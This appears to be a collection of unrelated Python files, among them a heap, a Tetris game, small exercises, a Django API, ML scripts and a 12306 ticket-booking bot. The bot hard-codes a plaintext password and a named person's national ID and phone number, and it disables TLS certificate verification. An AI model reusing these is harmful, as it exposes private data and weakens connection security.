return self.heap[i] <= self.heap[j]
# Swap two nodes. Assumes i & j are valid, O(1)
def _swap(self, i, j):
self.heap[i], self.heap[j] = self.heap[j], self.heap[i]
# Perform bottom up node swim, O(log(n))
def _swim(self, k):
        # Grab the index of the parent node with respect to k
parent = (k-1) // 2
# Keep swimming while we have not reached the
# root and while we're less than our parent.
while k > 0 and self._less(k, parent):
self._swap(parent, k)
k = parent
            # Grab the index of the parent node with respect to k
parent = (k-1) // 2
# Perform top down node sink, O(log(n))
def _sink(self, k):
while True:
left = 2*k + 1 # left node
right = 2*k + 2 # right node
smallest = left # Assume left is the smallest node of the two children
# Find which is smaller left or right node
# If right is smaller set smallest to be right
if right < self.size and self._less(right, left):
smallest = right
# Stop if we're outside the bounds of the tree
# or stop early if we cannot sink k anymore
if left >= self.size or self._less(k, smallest): break
# Move down the tree following the smallest node
self._swap(smallest, k)
k = smallest
# Removes a node at particular index, O(log(n))
def _remove_at(self, i):
if self.is_empty(): return None
self.size -= 1
removed_data = self.heap[i]
self._swap(i, self.size)
# Obliterate the value
del self.heap[self.size]
# Removed last element
if i == self.size: return removed_data
elem = self.heap[i]
# Try sinking element, and if sinking did not work try swimming
self._sink(i)
if self.heap[i] == elem: self._swim(i)
return removed_data
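# Illustrative self-test (added sketch, not part of the original module):
if __name__ == "__main__":
    pq = PQueue([5, 1, 4, 2, 3])
    assert len(pq) == 5 and pq.peek() == 1
    pq.add(0)
    drained = [pq.poll() for _ in range(len(pq))]
    assert drained == [0, 1, 2, 3, 4, 5]
    print("PQueue demo OK:", drained)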
|
import sdl2.ext
import tetris.configuration.Colors
from tetris.configuration.Configuration import *
class GameBoard(object):
def __init__(self):
self.board = [[None for x in range(num_columns())] for x in range(num_rows()+2)]
class GameState(object):
def __init__(self):
self.game_over = False
class MovementInput(object):
def __init__(self):
self.rotate_cw = False
self.rotate_ccw = False
self.move_left = False
self.move_right = False
self.soft_drop = False
self.hard_drop = False
def reset(self):
self.rotate_cw = False
self.rotate_ccw = False
self.soft_drop = False
self.hard_drop = False
self.move_left = False
self.move_right = False
class BlockCollection(object):
def __init__(self, blocks):
self.blocks = blocks
class BoardCoordinates(object):
def __init__(self, pos, offset):
self.pos = (pos[0]+offset[0], pos[1]+offset[1])
self.offset = offset
def get_ccw_offset(self):
return self.offset[1], -self.offset[0]
def get_cw_offset(self):
return -self.offset[1], self.offset[0]
def get_normalized_coordinates(self):
return self.pos[0]-self.offset[0], self.pos[1]-self.offset[1]
def get_ccw_coordinates(self):
center = self.get_normalized_coordinates()
offset = self.get_ccw_offset()
return center[0]+offset[0], center[1]+offset[1]
def get_cw_coordinates(self):
center = self.get_normalized_coordinates()
offset = self.get_cw_offset()
return center[0]+offset[0], center[1]+offset[1]
class MovementState(object):
def __init__(self):
self.locked = False
class AudioState(object):
def __init__(self):
self.play_soft_drop = False
self.play_line_clear = False
def reset(self):
self.play_soft_drop = False
self.play_line_clear = False
class EndGameCondition(sdl2.ext.Entity):
def __init__(self, world, game_board):
self.gamestate = GameState()
self.gameboard = game_board
class ControllablePiece(sdl2.ext.Entity):
def __init__(self, world, game_board, blocks):
self.blocks = blocks
self.movementinput = MovementInput()
self.gameboard = game_board
self.blockcollection = BlockCollection(blocks)
self.movementstate = MovementState()
self.audiostate = AudioState()
def clear(self):
self.delete()
for block in self.blockcollection.blocks:
block.delete()
class Block(sdl2.ext.Entity):
def __init__(self, world, color, game_board, offset):
center = (len(game_board.board[0])/2, 0)
block_width = window_width()/num_columns()
block_height = window_height()/(num_rows())
factory = sdl2.ext.SpriteFactory(sdl2.ext.SOFTWARE)
self.boardcoordinates = BoardCoordinates(center, offset)
posx = self.boardcoordinates.pos[0] * block_width
        posy = (self.boardcoordinates.pos[1]-2) * block_height  # parenthesized: rows 0-1 are the hidden spawn rows above the visible board
self.sprite = factory.from_color(tetris.configuration.Colors.WHITE, size=(block_width, block_height))
self.sprite.position = (posx, posy)
sdl2.ext.fill(self.sprite, color, (1, 1, block_width-2, block_height-2))
class IPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-2, 0))
blocks[1] = Block(world, color, game_board, (-1, 0))
blocks[2] = Block(world, color, game_board, (0, 0))
blocks[3] = Block(world, color, game_board, (1, 0))
super(IPiece, self).__init__(world, game_board, blocks)
class JPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-1, 0))
blocks[1] = Block(world, color, game_board, (0, 0))
blocks[2] = Block(world, color, game_board, (1, 0))
blocks[3] = Block(world, color, game_board, (1, 1))
super(JPiece, self).__init__(world, game_board, blocks)
class LPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-1, 0))
blocks[1] = Block(world, color, game_board, (0, 0))
blocks[2] = Block(world, color, game_board, (1, 0))
blocks[3] = Block(world, color, game_board, (-1, 1))
super(LPiece, self).__init__(world, game_board, blocks)
class OPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-1, 0))
blocks[1] = Block(world, color, game_board, (0, 0))
blocks[2] = Block(world, color, game_board, (-1, 1))
blocks[3] = Block(world, color, game_board, (0, 1))
super(OPiece, self).__init__(world, game_board, blocks)
class SPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-1, 1))
blocks[1] = Block(world, color, game_board, (0, 1))
blocks[2] = Block(world, color, game_board, (0, 0))
blocks[3] = Block(world, color, game_board, (1, 0))
super(SPiece, self).__init__(world, game_board, blocks)
class TPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-1, 0))
blocks[1] = Block(world, color, game_board, (0, 0))
blocks[2] = Block(world, color, game_board, (1, 0))
blocks[3] = Block(world, color, game_board, (0, 1))
super(TPiece, self).__init__(world, game_board, blocks)
class ZPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-1, 0))
blocks[1] = Block(world, color, game_board, (0, 0))
blocks[2] = Block(world, color, game_board, (0, 1))
blocks[3] = Block(world, color, game_board, (+1, 1))
super(ZPiece, self).__init__(world, game_board, blocks)
|
# Exercise 5.24 - Book
qtd = int(input('Quantos números primos você deseja ver? '))
num = 1
cont = 1
print(f'Os {qtd} primeiros números primos são ', end='')
while cont <= qtd:
inicio = 1
fim = num
div = 0
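    # count the divisors of num by trial division; num is prime iff it has exactly 2 divisors (1 and itself)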
while inicio <= fim:
if num % inicio == 0:
div += 1
inicio += 1
if div == 2:
print(f'{num}', end=', ' if cont <= (qtd - 1) else '.')
cont += 1
num += 1
|
from django.shortcuts import render
from visitsapi.forms import VisitsForm
from django.http import JsonResponse
from rest_framework import status
from django.core import serializers
import json
from django.views.decorators.csrf import csrf_exempt
from .models import Visit
# Create your views here.
@csrf_exempt
def visits(request):
if request.method == "POST":
visit_form = VisitsForm(request.POST)
is_valid = visit_form.is_valid()
if not is_valid:
response = JsonResponse({"errors": visit_form.errors})
response.status_code = status.HTTP_400_BAD_REQUEST
else:
visit = visit_form.save()
data = json.loads(serializers.serialize("json", [visit, ]))[0] # Model.objects?
response_data = {'id': data['pk']}
response_data.update(data['fields'])
response = JsonResponse(response_data)
response.status_code = status.HTTP_201_CREATED
return response
elif request.method == "GET":
data = json.loads(serializers.serialize("json", Visit.objects.all())) # Model.objects?
response = JsonResponse(data, safe=False)
response.status_code = status.HTTP_200_OK
return response
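# Rough usage sketch (route name assumed; actual fields come from VisitsForm, defined elsewhere):
#   POST <visits-url> with form-encoded VisitsForm fields -> 201 Created + JSON of the new Visit
#   GET  <visits-url>                                     -> 200 OK + JSON list of all Visit objects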
|
# -*- coding:utf-8 -*-
# Author: Jorden Hai
Name = input("Name:")
Age = int(input("Age:"))
Job = input("Job:")
Salary = int(input("Salary:"))
#raw_input (Python 2.x) corresponds to input (Python 3.x)
#in Python 2.x, input() evaluates the entry (whatever type you type is the type you get), which is redundant syntax
print('name','=',type(Name))
#Formatted output, option 1
info='''
---------info of Stuff ----------
Name:%s
Age:%d
Job:%s
Salary:%d
'''%(Name,Age,Job,Salary)
#Formatted output, option 2
info2 = '''
---------info of Stuff ----------
Name:{_Name}
Age:{_Age}
Job:{_Job}
Salary:{_Salary}
'''.format(_Name = Name,
_Age = Age,
_Job = Job,
_Salary = Salary)
#Formatted output, option 3
info3 = '''
---------info of Stuff ----------
Name:{0}
Age:{1}
Job:{2}
Salary:{3}
'''.format(Name,Age,Job,Salary)
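#Formatted output, option 4 (f-string, Python 3.6+) -- added here only as an illustration
info4 = f'''
---------info of Stuff ----------
Name:{Name}
Age:{Age}
Job:{Job}
Salary:{Salary}
'''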
print(info,info2,info3)
|
# counts all the vowels in a sentence
print("Enter a sentence: ")
sentence = input()
voweldictionary = {"a": 0, "e": 0, "i": 0, "o": 0, "u": 0}
for ch in sentence:
    if ch in voweldictionary:
        voweldictionary[ch] += 1
print(voweldictionary)
|
# -*- coding: utf-8 -*-
"""
by rohan
ver 0.0.1
"""
import time
#import secrets
import io
import requests
from PIL import Image
#Disable security SSL warning
from urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning
disable_warnings(InsecureRequestWarning)
class Dingdong12306:
def __init__(self):
self.session = requests.session()
self.header = {
"Host":"kyfw.12306.cn",
"Referer":"https://kyfw.12306.cn/otn/login/init",
"Connection":"keep-alive",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
}
    # 1. Get authorization code
#Remote Address:113.107.58.182:443
def captcha(self):
certUrl = "https://kyfw.12306.cn/passport/captcha/captcha-image?login_site=E&module=login&rand=sjrand"
rc = self.session.get(url=certUrl,headers=self.header,verify=False)
if rc.status_code != 200:
print(rc.status_code,"connect captcha server failed.")
print(rc.text)
self.captcha()
else:
#print(rc.content)
return rc.content
"""
#show image for certification code
from PyQt5.QtWidgets import QWidget,QApplication,QLabel,QLineEdit
from PyQt5.QtGui import QPixmap
import sys
app = QApplication(sys.argv)
wnd = QWidget()
wnd.resize(300,300)
wnd.setWindowTitle("验证码")
img = QPixmap()
img.loadFromData(rc.content)
limg = QLabel(wnd)
limg.setPixmap(img)
ltxt = QLabel("Text here",wnd)
ltxt.move(90,100)
edit = QLineEdit(wnd)
edit.move(0,200)
print(edit.text())
wnd.show()
app.exec_()
"""
#2. Post Certification code
def captchacheck(self,codenum):
postUrl = "https://kyfw.12306.cn/passport/captcha/captcha-check"
#post image position(x,y)
certpos = ["53,37","113,37","193,36","237,37","33,113","121,111","205,112","247,111"]
certnums = []
# Get input
        #codenum = input("Enter the indices of the recognized captcha images, 0-7: ")
# translate input num to image coordinates
for num in codenum:
certnums.append(certpos[int(num)])
postData = {"answer":certnums,"login_site":"E","rand":"sjrand"}
rp = self.session.post(url=postUrl,data=postData,headers=self.header,verify=False)
return rp.json()["result_message"]
##############3. uamtk##################
def uamtk(self):
uamtk = "https://kyfw.12306.cn/passport/web/auth/uamtk"
udata = {"appid":"otn"}
ru = self.session.post(uamtk,headers=self.header,data=udata,verify=False)
print(ru.json())#["result_message"])
return ru.json()
#4. Post account info
#######3. Login function################################################
def loginto(self):
#1) login to init page
loginit = "https://kyfw.12306.cn/otn/login/init"
self.session.get(loginit,headers=self.header,verify=False)
        # 2) check whether we are already logged in
loginstatus = self.uamtk()
print(loginstatus)
if loginstatus["result_code"] == 1:
#2) certification code check
self.captcha()
usr = "rohanr"#input("用户名: ")
psw = "alin520526"#input("密码: ")
loginurl ="https://kyfw.12306.cn/passport/web/login"
logindata={"username":usr,"password":psw,"appid":"otn"}
rl = self.session.post(url=loginurl,headers=self.header,data=logindata,verify=False)
#{"result_message":"登录成功","result_code":0,"uamtk":"FX4aNxll3XLCHe_XVUuIne5aVfPdmBIZxhr1r0"}
rcontype = rl.headers.get("Content-Type")
if rcontype == "application/json;charset=UTF-8":
print(rl.json()["result_message"])
return rl.json()
else:
print(rcontype,"登陆失败,重新登陆")
if rl.encoding != "utf-8":
rl.encoding = "utf-8"
print(rl.text)
rl.cookies.clear()
self.loginto()
#######4. uamtkclient#############################################################
def uamtkclient(self,uamtk):
uclient = "https://kyfw.12306.cn/otn/uamauthclient"
ucdata = {"tk":uamtk}
ruc = self.session.post(url=uclient,headers=self.header,data=ucdata,verify=False)
print(ruc.text)
return ruc.json()
#######5. queryticket#######################################################
def queryticket(self):
queryTicketRoot = "https://kyfw.12306.cn/otn/leftTicket/queryZ"
traindate = "2018-02-15"#time.strftime('%Y-%m-%d',time.localtime(time.time()))
fromstation = "SZQ"
tostation = "WXN"
ticketPam = {"leftTicketDTO.train_date":traindate,
"leftTicketDTO.from_station":fromstation,
"leftTicketDTO.to_station":tostation,
"purpose_codes":"ADULT"
}
rqt = self.session.get(queryTicketRoot,params=ticketPam,headers=self.header,verify=False)
#print(rqt.text)
ticketinfos = rqt.json()["data"]["result"]
secretStr = ""
for info in ticketinfos:
ticketInfo = info.split("|")
#print(ticketInfo)
secretHBStr = ticketInfo[36];
secretStr = ticketInfo[0]
buttonTextInfo = ticketInfo[1];
train_no = ticketInfo[2];
            # train number
station_train_code = ticketInfo[3];
start_station_telecode = ticketInfo[4];
end_station_telecode = ticketInfo[5];
from_station_telecode = ticketInfo[6];
to_station_telecode = ticketInfo[7];
            # departure time
start_time = ticketInfo[8];
arrive_time = ticketInfo[9];
lishi = ticketInfo[10];
canWebBuy = ticketInfo[11];
            # remaining-ticket info?
yp_info = ticketInfo[12];
start_train_date = ticketInfo[13];
train_seat_feature = ticketInfo[14];
location_code = ticketInfo[15];
from_station_no = ticketInfo[16];
to_station_no = ticketInfo[17];
is_support_card = ticketInfo[18];
controlled_train_flag = ticketInfo[19];
gg_num = ticketInfo[20]
gr_num = ticketInfo[21]
qt_num = ticketInfo[22]
            # soft sleeper berths
rw_num = ticketInfo[23]
rz_num = ticketInfo[24]
tz_num = ticketInfo[25]
            # standing tickets (no seat)
wz_num = ticketInfo[26]
yb_num = ticketInfo[27]
            # hard sleeper berths
yw_num = ticketInfo[28]
            # hard seats
yz_num = ticketInfo[29]
ze_num = ticketInfo[30]
zy_num = ticketInfo[31]
swz_num = ticketInfo[32]
rrb_num = ticketInfo[33]
yp_ex = ticketInfo[34]
seat_types = ticketInfo[35]
print(station_train_code,"始发时间:",start_train_date,start_time,"硬座:",yz_num,"硬卧:",yw_num)
if secretStr != "":
print("有票")
return secretStr,yp_info
else:
print(time.strftime('%H:%M:%S',time.localtime(time.time())),"无票")
time.sleep(0.1)
self.queryticket()
#########GetPasssengerInfo##################################################
def getpassengerinfo(self):
getpsgurl ="https://kyfw.12306.cn/otn/confirmPassenger/getPassengerDTOs"
psgdata = {"REPEAT_SUBMIT_TOKEN":"c412871cf1417f65f9e1f2c73b52d71d"}
rpsg = self.session.post(getpsgurl,headers=self.header,data=psgdata,verify=False)
print(rpsg.text)
##################checkuser################################################
def checkuser(self):
checkusrurl = "https://kyfw.12306.cn/otn/login/checkUser"
rcu = self.session.post(checkusrurl,headers=self.header,verify=False)
print(rcu.text)
return rcu.json()["data"]["flag"]
############submitorderrequest#################################################
def submitorderrequest(self):
suborderurl = "https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest"
subdata = {
"secretStr":"BWrC4LCammzezl3prL0K/4maDENFl+1ibz3ngJ74mP4NgMaP+K8Xsk6mPpp1NVzl1M0YOoi3Xnon",
"train_date":"2018-02-14",
"back_train_date":"2018-01-16",
"tour_flag":"dc",
"purpose_codes":"ADULT",
"query_from_station_name":"深圳",
"query_to_station_name":"武穴",
"undefined":""
}
rsub = self.session.post(suborderurl,headers=self.header,data=subdata,verify=False)
print(rsub.text)
##########checkorderinfo#####################################
def checkorderinfo(self):
checkorderurl = "https://kyfw.12306.cn/otn/confirmPassenger/checkOrderInfo"
checkdata = {
"cancel_flag":2,
"bed_level_order_num":"000000000000000000000000000000",
"passengerTicketStr":"1%2C0%2C1%2C%E9%98%AE%E7%81%BF%E5%BB%BA%2C1%2C421182198309214177%2C15818575246%2CN",
"oldPassengerStr":"%E9%98%AE%E7%81%BF%E5%BB%BA%2C1%2C421182198309214177%2C1_",
"tour_flag":"dc",
"randCode":"",
"whatsSelect":1,
"REPEAT_SUBMIT_TOKEN":"c412871cf1417f65f9e1f2c73b52d71d"
}
rcheck = self.session.post(checkorderurl,headers=self.header,data=checkdata,verify=False)
print(rcheck.text)
#########getQueueCount#############
def getqueuecount(self):
getqueurl = "https://kyfw.12306.cn/otn/confirmPassenger/getQueueCount"
quedata = {
"train_date":"Thu+Feb+15+2018+00%3A00%3A00+GMT%2B0800+(China+Standard+Time)",
"train_no":"650000K82402",
"stationTrainCode":"K824",
"seatType":1,
"fromStationTelecode":"BJQ",
"toStationTelecode":"WXN",
"leftTicket":"5G1YAQoXFCB063z0qu7F8WYFK4OiLgTK8S4IZXiyeejNJukvHZ%2FHvtmO%2BH8%3D",
"purpose_codes":"00",
"train_location":"Q7",
"_json_att":"",
"REPEAT_SUBMIT_TOKEN":"c412871cf1417f65f9e1f2c73b52d71d"
}
rq = self.session.post(getqueurl,headers=self.header,data=quedata,verify=False)
print(rq.text)
##########confirmSingleForQueue#######################
def confirmsingleforqueue(self):
confurl = "https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue"
condata = {
"passengerTicketStr":"1,0,1,阮灿建,1,421182198309214177,15818575246,N",
"oldPassengerStr":"阮灿建,1,421182198309214177,1_",
"randCode":"",
"purpose_codes":"00",
"key_check_isChange":"9EFBA275BC092DDC2C058DCCAF680A7A6D8A463718E8BD571AB5F0C3",
"leftTicketStr":"5G1YAQoXFCB063z0qu7F8WYFK4OiLgTK8S4IZXiyeejNJukvHZ%2FHvtmO%2BH8%3D",
"train_location":"Q7",
"choose_seats":"",
"seatDetailType":"000",
"whatsSelect":1,
"roomType":"00",
"dwAll":"N",
"REPEAT_SUBMIT_TOKEN":"c412871cf1417f65f9e1f2c73b52d71d"
}
rcon = self.session.post(confurl,headers=self.header,data=condata,verify=False)
print(rcon.text)
###########queryOrderWaitTime#################################
def queryorderwaittime(self):
qurl = "https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime"
param ={
"random":"1516086113921",
"tourFlag":"dc",
"_json_att":"",
"REPEAT_SUBMIT_TOKEN":"c412871cf1417f65f9e1f2c73b52d71d"
}
rq = self.session.get(qurl,headers=self.header,params=param,verify=False)
print(rq.text)
#############resultOrderForDcQueue########################
def resultorderforqueue(self):
rurl = "https://kyfw.12306.cn/otn/confirmPassenger/resultOrderForDcQueue"
rdata = {
"orderSequence_no":"EA39818077",
"_json_att":"",
"REPEAT_SUBMIT_TOKEN":"c412871cf1417f65f9e1f2c73b52d71d"
}
rr = self.session.post(rurl,headers=self.header,data=rdata,verify=False)
print(rr.text)
#resultl = loginto(se,header)
#uamtk(se,header)
#queryticket(se,header)
#getpassengerinfo(se,header)
#checkuser(se,header)
#submitorderrequest(se,header)
#checkorderinfo(se,header)
#getqueuecount(se,header)
#confirmsingleforqueue(se,header)
#queryorderwaittime(se,header)
#resultorderforqueue(se,header)
|
# Deadlock Detection, similar to Banker's
from banker import Banker, sumColumn, IncrVec, DecrVec, GtVec, LeVec
class DeadlockDetector(Banker):
def __init__(self, alloc, totalRsrc):
Banker.__init__(self, alloc, None, totalRsrc)
def detect(self, Request):
'''detect deadlock with the request matrix'''
# 1(a) initialize Work = a copy of Available
Work = self.Available[:]
# 1(b) Finish[i] = (Allocation[i] == [0, ...0])
Finish = [False for i in range(self.n)]
for i in range(self.n):
Finish[i] = all(v == 0 for v in self.Allocation[i])
# optionally, you can keep a Sequence list
Sequence = []
print('Finish=%s' % Finish)
        for _ in range(self.n):
            progressed = False
            for i in range(self.n):
                # Step 2: similar to safety algorithm
                # if there is an i such that (Finish[i] == False)
                # and Request_i <= Work, (hint: LeVec() or GtVec()) then
                # Step 3:
                # Work += Allocation[i] # hint IncrVec()
                # Finish[i] = True
                # continue Step 2
                if Finish[i] is False:
                    print('i=%d, ' % i, end="")
                    print('(Request[%d]=%s' % (i, Request[i]), end=' ')
                    print('<= Work=%s)' % Work, end=' ')
                    if LeVec(Request[i], Work):
                        print('True, append P%d' % i)
                        Sequence.append(i)
                        IncrVec(Work, self.Allocation[i])
                        Finish[i] = True
                        progressed = True
                        print('(+Allocation[%d]=' % i, end='')
                        print(self.Allocation[i], end=')')
                        print('=> Work=%s' % Work, end=',')
                        print('Finish=%s' % Finish)
                    else:
                        print('False, P%d must wait' % i)
                else:
                    print('i=%d, ' % i, end="")
                    print('Finish[%d] True, skipping' % i)
            if not progressed:
                # no process could proceed during a full pass; stop scanning
                break
# Step 4: either done iterating or (no such i exists)
# Finish vector indicates deadlocked processes.
# if all True then no deadlock.
if False not in Finish:
return Sequence
return None
if __name__ == '__main__':
Allocation = [[0, 1, 0], [2, 0, 0], [3, 0, 3], [2, 1, 1], [0, 0, 2]]
Request1 = [[0, 0, 0], [2, 0, 2], [0, 0, 0], [1, 0, 0], [0, 0, 2]]
Request2 = [[0, 0, 0], [2, 0, 2], [0, 0, 1], [1, 0, 0], [0, 0, 2]]
Available = [0, 0, 0]
TotalResources = [7, 2, 6]
d = DeadlockDetector(Allocation, TotalResources)
s = d.detect(Request1)
if s is not None:
print('sequence = %s' % s)
else:
print('deadlock')
s = d.detect(Request2)
if s is not None:
print('sequence = %s' % s)
else:
print('deadlock')
|
# -*- coding: utf-8 -*-
"""
Package for third-party extension libraries.
"""
|
import re
pattern = r"(\*|@)([A-Z][a-z]{2,})\1: \[([A-Za-z])\]\|\[([A-Za-z])\]\|\[([A-Za-z])\]\|$"
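# pattern: a marker (* or @), a capitalized name of 3+ letters, the same marker again (\1),
# then ": " and exactly three single letters, each wrapped in [...] and followed by |, at end of line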
n = int(input())
for _ in range(n):
message = input()
valid_message = re.findall(pattern, message)
if len(valid_message) == 0:
print("Valid message not found!")
else:
print(f"{valid_message[0][1]}: {ord(valid_message[0][2])} {ord(valid_message[0][3])} {ord(valid_message[0][4])}")
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 25 13:04:01 2018
@author: Rafael Rocha
"""
import numpy as np
import keras
from sklearn.metrics import classification_report, confusion_matrix
from keras.optimizers import SGD, Adam, Adagrad, RMSprop
from keras.losses import categorical_crossentropy
from sklearn.model_selection import train_test_split, cross_val_score, KFold
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Input
from keras.models import Model
from keras import backend as K
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.ensemble import VotingClassifier
data_set_name = 'train_test_splits_3.npz'
data = np.load(data_set_name)
x = data['x']
y = data['y']
train_index = data['train_index']
test_index = data['test_index']
# samples = data['samples']
x_train, y_train = x[train_index], y[train_index]
x_test, y_test = x[test_index], y[test_index]
# x_train_sample, y_train_sample = x_train[samples[0]], y_train[samples[0]]
# x_test = data['x_test']
# y_test = data['y_test']
x_train = x_train.reshape(x_train.shape[0], 128, 256, 1)
x_test = x_test.reshape(x_test.shape[0], 128, 256, 1)
input_shape = (np.size(x_train, 1), np.size(x_train, 2), 1)
def build_model_sequential_1():
model = keras.Sequential()
model.add(Conv2D(32, kernel_size=(3, 3), strides=1, activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(3, activation='softmax'))
model.compile(loss=categorical_crossentropy,
optimizer=SGD(lr=0.01, momentum=.3),
metrics=['accuracy'])
return model
def build_model_sequential_2():
model = keras.Sequential()
model.add(Conv2D(32, kernel_size=(5, 5), strides=1, activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(3, activation='softmax'))
model.compile(loss=categorical_crossentropy,
optimizer=SGD(lr=0.01, momentum=.3),
metrics=['accuracy'])
return model
def build_model_sequential_3():
model = keras.Sequential()
model.add(Conv2D(32, kernel_size=(5, 5), strides=5, activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(3, activation='softmax'))
model.compile(loss=categorical_crossentropy,
optimizer=SGD(lr=0.01, momentum=.3),
metrics=['accuracy'])
return model
def build_model_sequential_4():
model = keras.Sequential()
model.add(Conv2D(32, kernel_size=(11, 11), strides=5, activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(3, activation='softmax'))
model.compile(loss=categorical_crossentropy,
optimizer=SGD(lr=0.01, momentum=.3),
metrics=['accuracy'])
return model
def build_model_sequential_5():
# lenet
model = keras.Sequential()
model.add(Conv2D(20, kernel_size=(5, 5), strides=1,
padding='same', activation='tanh',
input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(50, kernel_size=(5, 5), strides=(
5, 5), padding='same', activation='tanh'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(500, activation='tanh'))
model.add(Dense(3, activation='softmax'))
model.compile(loss=categorical_crossentropy,
optimizer=SGD(lr=0.01, momentum=0.3),
metrics=['accuracy'])
return model
def build_model_sequential_6():
# lenet_5
model = keras.Sequential()
model.add(Conv2D(20, kernel_size=(5, 5), strides=5,
padding='same', activation='tanh',
input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(50, kernel_size=(5, 5), strides=(
5, 5), padding='same', activation='tanh'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(500, activation='tanh'))
model.add(Dense(3, activation='softmax'))
model.compile(loss=categorical_crossentropy,
optimizer=SGD(lr=0.01, momentum=0.3),
metrics=['accuracy'])
return model
# results = []
model_1 = KerasClassifier(build_fn=build_model_sequential_6,
epochs=20,
verbose=1)
model_1.fit(x_train, y_train)
y_pred = model_1.predict(x_test)
print(classification_report(y_test, y_pred, digits=4))
print(confusion_matrix(y_test, y_pred))
# results.append(y_pred)
print(y_pred)
#np.savetxt('Lenet_results_100_7.txt', [y_pred], fmt='%i', delimiter=',')
# model_1.fit()
|
import ctypes
import numpy as np
from numpy.ctypeslib import ndpointer
from scipy.io import wavfile
import os
import glob
def speed_change(in_wav, out_wav, lib_file="./speed_change.dll", speed_rate=2):
"""
args:
in_wav: 输入wav文件的路径
out_wav: 语速改变后wav文件的输出路径
lib_file: 编译的c代码
speed_rate: 语速提升多少
"""
    fs, wav = wavfile.read(in_wav)  # read the sample rate and samples from the wav file
    wav_len = len(wav)  # input length
    out_len = round(wav_len/speed_rate)  # output length
    ## load the compiled C library
    lib = ctypes.cdll.LoadLibrary
    sonic_lib = lib(lib_file)
    wav_speech_change = sonic_lib.wavChangeSpeed
    wav_speech_change.argtypes = [ndpointer(ctypes.c_short), ndpointer(
        ctypes.c_short), ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.c_float]
    wav_speech_change.restype = None  # the ctypes attribute is 'restype'; 'restypes' was a typo
    result = np.zeros([out_len], dtype=np.int16)
    wav_speech_change(wav, result, 1, fs, wav.shape[0], speed_rate)
    wavfile.write(out_wav, fs, result)  # write the speed-changed samples to a wav file
return result
if __name__ == "__main__":
wav_input = "./test/normal.wav"
wav_output = "./test/speedup.wav"
lib_file = "./speed_change.dll"
    ## compile the C code into a shared library
os.system("gcc -o " + lib_file + " -shared -fPIC runsonic.c sonic.c sonic.h")
    ## change the speech speed
speed_change(wav_input, wav_output, lib_file="./speed_change.dll")
|
import argparse
import numpy as np
import tensorflow as tf
import tensorflow_compression as tfc
import os
from scipy import misc
import CNN_recurrent
import motion
import functions
import helper
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
config = tf.ConfigProto(allow_soft_placement=True)
sess = tf.Session(config=config)
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--path", default='BasketballPass')
parser.add_argument("--frame", type=int, default=100)
parser.add_argument("--f_P", type=int, default=6)
parser.add_argument("--b_P", type=int, default=6)
parser.add_argument("--mode", default='PSNR', choices=['PSNR', 'MS-SSIM'])
parser.add_argument("--metric", default='PSNR', choices=['PSNR', 'MS-SSIM'])
parser.add_argument("--python_path", default='path_to_python')
parser.add_argument("--CA_model_path", default='path_to_CA_EntropyModel_Test')
parser.add_argument("--l", type=int, default=1024, choices=[8, 16, 32, 64, 256, 512, 1024, 2048])
parser.add_argument("--N", type=int, default=128, choices=[128])
parser.add_argument("--M", type=int, default=128, choices=[128])
args = parser.parse_args()
# Settings
I_level, Height, Width, batch_size, Channel, \
activation, GOP_size, GOP_num, \
path, path_com, path_bin, path_lat = helper.configure(args)
# Placeholder
Y0_com_tensor = tf.placeholder(tf.float32, [batch_size, Height, Width, Channel]) # reference frame
Y1_raw_tensor = tf.placeholder(tf.float32, [batch_size, Height, Width, Channel]) # raw frame to compress
hidden_states = tf.placeholder(tf.float32, [8, batch_size, Height//4, Width//4, args.N]) # hidden states in RAE
c_enc_mv, h_enc_mv, \
c_dec_mv, h_dec_mv, \
c_enc_res, h_enc_res, \
c_dec_res, h_dec_res = tf.split(hidden_states, 8, axis=0)
